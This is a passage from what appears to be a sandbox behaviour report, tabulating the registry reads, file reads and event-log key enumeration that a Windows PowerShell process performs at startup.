| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
